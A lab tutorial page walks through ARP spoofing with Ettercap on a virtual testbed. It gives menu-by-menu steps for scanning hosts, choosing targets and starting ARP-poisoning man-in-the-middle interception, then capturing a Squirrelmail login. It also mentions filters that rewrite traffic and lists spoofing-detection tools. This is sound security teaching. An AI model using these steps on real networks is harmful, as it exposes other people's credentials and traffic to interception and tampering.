My-Tiny.Net :: Breaking Bad
Ettercap: ARP Spoofing
Ettercap is a powerful tool for network analysis and security cracking. Ettercap has two main strengths:
First, Ettercap is capable of fully automating ARP spoofing (also known as ARP poisoning) where a computer on a switched network forces other hosts to send their data to the attacker rather than the actual network gateway or destination. This allows an attacker with complete control of one host on the network to choose to send the traffic on, change it, or throw it away ...
Second, Ettercap is capable of performing man-in-the-middle attacks on many protocols, including SSH1 and HTTPS. Ettercap alone intercepts and resends packets, and "etterfilters" can be used to modify the content. This could be as simple as changing the word "buy" to "sell" in all web traffic, or as complex as substituting encryption keys for secure transmission.
To get started, you need to migrate your TinyNet Webserver and MailHost to Net-R (see Setup::Single Subnet on the menu). Using Ettercap to poison a gateway is a bit more complicated so be sure to read the man pages if you want to do that.
Then create a normal Net-R host and install Ettercap from the TinyNetConfig.iso
-
Start Ettercap with the simple menu (ncurses) interface:
ettercap -C -
From the Sniff menu, select Unified Sniffing.
-
From the Hosts menu, select Scan for hosts.
When it is finished, select Host List to see all the potential targets that Ettercap found. -
Select the domserv (192.168.234.101) in the Host List and press 1 to add it to the Targets List
-
Select the others in the Host List (one-by-one) and press 2 to add them to the Targets List
-
Use
Ctrl-Qto exit the Host List, then select Targets and Current Targets from the menu.
The display shows that Ettercap will catch and forward traffic between Target 1 and Target(s) 2. -
Use
Ctrl-Qto exit the Targets List, select MITM (Man in the Middle) on the menu and select Arp Poisoning to spoof the ARP tables. PressEnterto leave the Parameters box empty.
links and log into Squirrelmail on your Net-R webserver. Watch your Ettercap VM to see your credentials!
Try
arp on each VM to see the output ...
To stop sniffing, just go to the Mitm menu and select Stop Mitm attacks.
Or, just press
Ctrl-X to "un-poison" the network and close.
Try
arp on each VM to see the output ...
The nice thing about doing this on a testbed is that you really can't break anything or end up in jail.
Interface Tips:
- Use Tab and the arrow keys to change the window/menu you are interacting with.
- Use
Ctrl-Qto close any active window in the Ettercap interface.
Ettercap on VMs Tip:
The Host OS Bridged interface (192.168.56.1) makes using targets ALL ALL unstable.Further Reference
| Good overview - Great Site: | https://www.veracode.com/security/arp-spoofing |
| Ettercap man pages |
ettercap ettercap_curses etter.conf etterlog etterfilter ettercap_plugins |
| Also at irongeek.com |
Fun with Ettercap Filters Tons of Hacking Illustrated Videos Useful Articles Apps and Scripts what the .gov and .mil find interesting ... |
XArp is a GUI ARP spoofing detection and active probing software that works on both Windows and Linux (configurable for OS X as well). ArpON is a portable handler daemon for securing ARP against spoofing and cache poisoning. There are a few others like Arpwatch, Antidote, ArpAlert so just Google them.